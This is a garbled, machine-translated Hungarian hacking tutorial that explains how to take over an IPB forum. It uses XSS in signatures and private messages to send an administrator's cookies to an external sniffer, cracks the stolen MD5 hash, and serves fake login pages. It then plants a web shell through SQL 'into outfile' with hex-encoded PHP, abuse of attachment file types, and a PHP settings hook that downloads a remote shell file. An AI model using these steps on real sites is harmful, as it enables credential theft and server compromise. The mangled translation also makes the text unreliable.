Az adatbázis titkosítása az ipb fórumon xss archívummal - szoftverek, hackok, programok, cikkek lágy portálja
Általában találtam egy módszert, hogy a webhelyet, és ott és bd-t letapogassam az ipb fórumon az xss használatával.
Mi az xss?
XSS (Cross Site Scripting - "crossite scripting") - a sebezhetőség típusa
interaktív információs rendszerek az interneten. Az XSS akkor jelenik meg, amikor a kiszolgáló létrehoz
lapok valamilyen okból kapnak felhasználói szkripteket. Az ilyen támadások sajátosságai
hogy ahelyett, hogy közvetlenül támadnák a kiszolgálót, sebezhetővé teszik őket
kiszolgálónak az ügyfél támadásának eszközeként.
Néha a "CSS" kifejezést használják a kifejezésre, de nincs összefüggés a kaszkáddal
stíluslapok használatával használja az "XSS" rövidítést.
Most az XSS az észlelt sebezhetőségek körülbelül 15% -át teszi ki [1]. Hosszú idő
a programozók nem adtak számukra megfelelő figyelmet, ártalmatlannak ítélve őket. Ez a vélemény azonban
téves: az oldalon, vagy a [láthatjuk linkek Csak regisztrált és aktivált felhasználók] lehet nagyon érzékeny adatokat (pl
a rendszergazda munkamenet-azonosítója). Egy népszerű webhelyen a szkript gondoskodik
DoS-ataky.
Betűvel működik
Példa népszerű kiszolgálókra: Asterios ([Csak regisztrált és aktivált felhasználók láthatnak linkeket])
Az XSS működni fog és sokkol, de túl hosszú üzeneteket tilos (az aláírásban) és in
ezek a címkék letiltva.
Először is meg kell derítenünk, hogy a TRACE módszer engedélyezett-e a fórumon, ha ez a módszer engedélyezve van
akkor sokkal könnyebb lesz hozzáférni az admin területhez.
Először regisztrálnunk kell egy online szippantót, én ezt választottam
OnLine szurkoló || XakNet ([Csak regisztrált és aktivált felhasználók láthatnak linkeket])
1) Ha az egeret az _______________ fölé helyezi. naplózókat küldenek a szippantónak.
] __________________________________________________ ____________________________
[/ betűszó]
2) Ez a kód automatikusan (még akkor is, ha az egeret nem küldi) küldi a naplót, hogy szippantsani, DE!
Működik csak az Opera-ban!
[/ betűszó]
] [/ betűszó]
beilleszteni a kódot (ami magasabb)
Most menj a fórumra, hogy megpróbáljuk hackelni és írni egy új üzenetet magadnak ellenőrizni
[Csak regisztrált és aktivált felhasználók láthatják a linkeket]
Push küldés
Megnézzük üzenetünket a bejövőben, lesz egy olyan üzenet, mint a '>, de nem húzunk
figyelem (ha behelyezte a második kódot, amely magasabb, akkor vigye az egeret a szöveg fölé
__________________), és menjünk a snifferünkhöz. XakNet ([Csak regisztrált és aktivált felhasználók láthatnak linkeket])
És nézd meg a naplókat
Ha nincsenek naplók, akkor nem operált, hanem (internet explorer, vagy firefox és
Ha a naplókban pass_hash van, akkor a nyomkövetés engedélyezett.
[Csak regisztrált és aktivált felhasználók láthatják a linkeket]
Aztán ezt tesszük:
1) Lépjen a profilra, és kattintson az Aláírás szerkesztése gombra
2) Beillesztjük a tesztelt kódot
3) Mi írunk a rendszergazda az oldal (Better a fő adminisztrátor) írunk bármilyen üzenetet. Ha a
akkor a kódot az aláírásba helyezi, akkor nem kell a kódot beilleszteni az üzenetbe. stb
és a levél olvasható, és megjeleníti az aláírását! Ha a fórum tiltja a címkéket
majd helyezze be a kódot az üzenetbe, és küldje el az adminisztrátort
aláírás zamaskkiruyte, hogy semmi nebylo látható az aláírás erről, lásd következő)
4) Várjuk, hogy az adminisztrátor elolvassa az üzenetet és a naplók a keresőben lesznek.
5) Miután megkapta a cookie-kat (naplók), lesz egy sor
pass_hash = c18c047c77589bpa989cc327509e7d5e;
18c047c77589bpa989cc327509e7d5e ez a jelszó csak az md5-ben titkosítva, most
meg kell dekódolni a Prog PasswordsPro program használatával vagy az online szolgáltatások használatával
dekódolás.
c0llision - elosztott lm / md5 / ntlm jelszó hálózat visszaállítása ([Csak regisztrált és aktivált felhasználók láthatnak linkeket])
Hashkiller - Index - MD5 cracken at hashkiller.com ([Csak regisztrált és aktivált felhasználók láthatják a linkeket])
A visszafejtés után meg kell adni egy átjárót, amely alatt az admin területre megyünk, ahol
hogyan kell kitölteni egy shell nézd tovább.
2.1) A TRACE-módszer ki van kapcsolva vagy más módon is, ha hamis jelszavakat akarsz ellopni
.com zónát a pochta.com címre lehet küldeni)
1) Automatikus hamis nyitás egy keretben (csak operában működik!)
] [/ betűszó]
2) A hamisítvány megnyitása, amikor a szövegre mutat. (Mindenhol működik)
__________________________________________________ _____________________] [/ acr
És így tovább küldjük az üzenetet önmagunknak (lásd fent) a fenti kóddal (a
1 vagy a második)
Elolvastuk az üzenetedet, és felfelé dobtál egy hamis (Figyelj a
(ne felejtsd el elrejteni, ahogy alább le van írva) vagy jobb
aláírást, és küldje el az adminisztrátort a HP-nak. Üzenetet is írhat a fórumon, így Ön
nem csak adminisztrátorokat tudsz gyűjteni.
És itt van például az adminisztrátor, aki azt gyanította, hogy aláírta magát, és úgy döntött, hogy ellenőrizze az aláírást és
[Csak regisztrált és aktivált felhasználók láthatják a linkeket]
És így kaptuk a karaktereket
# X68; # X74; # X74; # x70; # X3A; # x2F; # x2F; # X6c; # x32; # X66; # X61; # x6E; # X2d értéket kapjuk; # x64; # x6
És ha az admin ezt látja _________________________________. és körülbelül megmutatja
gyanakvó, és újra megnézzük az aláírást, és újra kapunk egy banánt, miért? mert
post2
Olyan lesz ez így:
[Csak regisztrált és aktivált felhasználók láthatják a linkeket]
Ez az aláírás színe, vagyis elrejtjük a színt.
A kódunk
Hol # fff7ad a színünket
Ennek eredményeképpen a kódot a lehető legnagyobb mértékben elrejtettük:
És így mentünk az admin területre, és meg kell töltenünk a héjat, többféle módon is lehet
Támogatás-> SQL kezelése-> Futási folyamatok-> Új lekérdezés futtatása
válassza a 0x3c3f706870696e666f28293b3f3e parancsot az outfile fájlba
'Z: /home/site.ru/ [Csak regisztrált és aktivált felhasználók láthatnak linkeket]'
a teljes elérési utat így nézhetjük meg:
-> [Csak regisztrált és aktivált felhasználók láthatják a linkeket] forum /? Act = attachcode = attach_upload_remove
Shell: [Csak regisztrált és aktivált felhasználók láthatják a linkeket]
PS: Jogunk van
Fórumok-> Mellékletek-> Fájltípusok
Kattintson az "Új típus hozzáadása" -> "Használjon valamilyen típust alap típusként?" - válasszon
"PHP alapú" -> "Csatolt fájlkiterjesztés" - php3 (csak php in
az alapértelmezett lista és a rendszerindítás automatikusan átkerül a .txt fájlba) -> "MIME típus
Stomp a profilodban:
[Csak regisztrált és aktivált felhasználók láthatják a linkeket]
[Csak regisztrált és aktivált felhasználók láthatják a linkeket]
Előzetesen hozzáteszünk a fájltípusok dekódolásához .phtml és állítsuk be az MIME típusát
fotók.
Ezután hozzáadjuk a felhasználók profiljában a .phtml dekóderek kitöltését és bármelyik méretét (mint a
annál jobb, annál jobb).
Majd nyugodtan töltse be a kagylót, és nézze meg a tulajdonságokat a héjhoz.
Az okok miért nem sikerült betölteni a parancsértelmezőt: A mappa avatárjainak vagy a html / hangulatjeleknek jogai vannak
Menjen a "beállítások" bármelyikére, kattintson egy új beállítás hozzáadására, és a
"A PHP kód futtatása
mielőtt megjelenítené vagy elmentené a beállításokat: "írj bármilyen php kódot, például:
-----------------------------------------
$ linky = "[Csak regisztrált és aktivált felhasználók láthatják a linket] site_s_shell / shell.txt";
$ saved = "/ home // [Csak regisztrált és aktivált felhasználók láthatják a linket]";
$ from = fopen ("$ linky", "r");
$ to = fopen ("$ mentve", "w");
míg (! feof ($ from))<
$ string = fgets ($, 4096);
fputs ($ a, $ string);
>
fclose ($ -tól);
echo "kész";
fclose ($ -tól);
A webhéj megtalálja magát a google.com webhelyen, hogy személyesen segítsen neked használni
Dump.Ru - fájlmegosztás, ingyenes fájlfogadás, regisztrálás nem szükséges ([Csak regisztrált és aktivált felhasználók láthatnak linkeket])
vagy
AK-74 Security Team Web Shell ([Csak regisztrált és aktivált felhasználók láthatják a linkeket])
Miután elárasztotta a shell-t, menjen a gyökérbe, ahol megtalálhatja a webhelyet, és keresse meg a konfigurációt, ahol a kapcsolat beállításait az adatbázisba.
A xxi asztériumok csak akkor működnek, ha válaszolnak, ha látja az xss-et, ezért jobb, ha nem kockáztat)
Ez az aláírás színe, vagyis elrejtjük a színt.
kód:
kódunkat
a [* color = "# fff7ad"] kódot [/ color *] és magyarázza meg, hogy *
37 perc után hozzáadva
Annak érdekében, hogy ne szenvedjen TRACE használja a segédprogramot [Csak regisztrált és aktivált felhasználók láthatják a linket]
Megmutatja, hogy a nyomkövetés engedélyezett-e vagy sem